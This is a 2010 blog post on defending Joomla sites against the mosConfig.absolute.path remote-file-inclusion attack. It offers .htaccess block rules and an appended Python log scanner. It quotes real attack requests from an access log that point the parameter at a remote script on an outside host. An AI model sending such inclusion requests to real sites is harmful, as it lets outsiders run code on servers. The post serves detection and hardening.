OFF-SOFT.net


Block mosConfig.absolute.path attack

Published on May 10th, 2010 | No Comments
Recently, I have seen a "confirm mosConfig.absolute.path attack" on my Joomla! site.
Then I felt the need to take some measures.
So this post might help those who have the same problem.



Edit .htaccess

This post explains how to block the attack with a simple .htaccess edit.


# Block out any script trying to set a mosConfig value through the URL
RewriteCond %{QUERY_STRING} mosConfig_[a-zA-Z_]{1,21}(=|\%3D) [OR]

You will find a line like the one above in the .htaccess file. Add the following lines directly under it.

RewriteCond %{QUERY_STRING} .*mosConfig.* [OR]
RewriteCond %{QUERY_STRING} .*mosconfig.* [OR]
RewriteCond %{QUERY_STRING} .*http:.* [OR]
That is all there is to it, but take care with the third line.
It blocks any request whose query string contains the string "http:", so extensions or plug-ins that legitimately pass a URL in a parameter will be blocked too. Check your plug-in parameters before you enable it.
Note also that RewriteCond patterns are case-sensitive unless the [NC] flag is given, which is why both spellings of mosConfig are listed.

You should also check the access log. If you find entries like the following, your site may be under attack.

118.220.174.89 - - [27/Apr/2010:02:38:33 +0900] "GET /?option=com_remository&Itemid=&mosConfig.absolute.path=http://bboards.co.nz////data/file//music_skin/id1.txt?? HTTP/1.1" 200 41813 "-" "Mozilla/5.0"
118.220.174.89 - - [27/Apr/2010:02:38:34 +0900] "GET /?option=com_content&view=...40:extemtions&directory=1%20%20//index.php?option=com_remository&Itemid=&mosConfig.absolute.path=http://bboards.co.nz////data/file//music_skin/id1.txt?? HTTP/1.1" 200 42653 "-" "Mozilla/5.0"
118.220.174.89 - - [27/Apr/2010:02:38:34 +0900] "GET /?option=com_remository&Itemid=&mosConfig.absolute.path=http://bboards.co.nz////data/file//music_skin/id1.txt?? HTTP/1.1" 200 41813 "-" "Mozilla/5.0"
118.220.174.89 - - [27/Apr/2010:02:38:35 +0900] "GET /?option=com_remository&Itemid=&mosConfig.absolute.path=http://bboards.co.nz////data/file//music_skin/id1.txt?? HTTP/1.1" 200 41811 "-" "Mozilla/5.0"
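As an added example (not code from the original post or from Joomla!), the script below turns the RewriteCond patterns discussed above into Python regexes so you can test a query string against them before touching .htaccess, and scans access-log lines like the ones above for any mosConfig override, pulling out the remote URL the attacker tried to include. It also shows why Joomla's default rule did not stop these requests: PHP folds dots in request variable names to underscores, so the attacker's spelling mosConfig.absolute.path reaches the same $mosConfig_absolute_path variable while never containing the "mosConfig_" text the default regex looks for. The first sample log line is the post's own; the second, with the address 203.0.113.5 and example.com, is constructed to show a legitimate request that the added "http:" condition would also block.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Joomla's default RewriteCond plus the three conditions the post adds, as
# Python regexes. They are applied to the raw query string, as mod_rewrite
# does. RewriteCond patterns are case-sensitive unless [NC] is given, which
# is why the post lists both spellings of mosConfig.
RULES = {
    "joomla_default": re.compile(r"mosConfig_[a-zA-Z_]{1,21}(=|%3D)"),
    "mosConfig": re.compile(r"mosConfig"),
    "mosconfig": re.compile(r"mosconfig"),
    "http": re.compile(r"http:"),
}


def matching_rules(query_string):
    """Names of the RewriteCond patterns that fire on a raw query string."""
    return [name for name, rx in RULES.items() if rx.search(query_string)]


def is_blocked(query_string):
    """True if any of the [OR]-chained conditions matches, i.e. the rule that follows them would refuse the request."""
    return bool(matching_rules(query_string))


# Apache combined log format, enough to pull out client IP, request and status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"'
)


def parse_log_line(line):
    """Split one combined-format line; returns None for lines that do not parse."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    entry = m.groupdict()
    entry["query"] = urlsplit(entry["target"]).query
    return entry


def find_rfi_attempts(lines):
    """Scan access-log lines for any mosConfig* override and record the URL it points at.

    PHP folds '.' to '_' when it registers request variables, so
    mosConfig.absolute.path lands in $mosConfig_absolute_path. The default
    Joomla rule only looks for the underscore form, which is why the dotted
    form seen in the post's logs slips past it. The check below folds the
    same way so both spellings are caught.
    """
    hits = []
    for line in lines:
        entry = parse_log_line(line)
        if entry is None:
            continue
        for key, value in parse_qsl(entry["query"], keep_blank_values=True):
            if key.replace(".", "_").lower().startswith("mosconfig_"):
                hits.append({
                    "ip": entry["ip"],
                    "time": entry["time"],
                    "param": key,
                    "value": value,
                    "status": int(entry["status"]),
                })
    return hits


# Sample input: the first request from the post's access log, plus a
# constructed benign request (203.0.113.5, example.com are placeholders)
# that passes a URL in a parameter and so trips the added "http:" condition.
SAMPLE_LOG = [
    '118.220.174.89 - - [27/Apr/2010:02:38:33 +0900] "GET /?option=com_remository&Itemid=&mosConfig.absolute.path=http://bboards.co.nz////data/file//music_skin/id1.txt?? HTTP/1.1" 200 41813 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [27/Apr/2010:10:00:00 +0900] "GET /?option=com_content&return=http://example.com/page HTTP/1.1" 200 1024 "-" "Mozilla/5.0"',
]


if __name__ == "__main__":
    for line in SAMPLE_LOG:
        entry = parse_log_line(line)
        if entry is None:
            continue
        print(entry["ip"], "blocked by", matching_rules(entry["query"]) or "nothing")
    for hit in find_rfi_attempts(SAMPLE_LOG):
        print("RFI attempt from", hit["ip"], "->", hit["value"], "status", hit["status"])
```

Two things worth noticing when you run it. The attack line is caught only by the added "mosConfig" and "http:" conditions, never by Joomla's default one, for the dot-versus-underscore reason above. The benign line is caught by "http:" alone, which is exactly the false positive the post warns about. A further caveat: mod_rewrite matches the raw, still percent-encoded query string, so a request that spells the value as http%3A would pass the "http:" condition while PHP still decodes it; the log scanner, which decodes parameters with parse_qsl, would still flag such a request.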
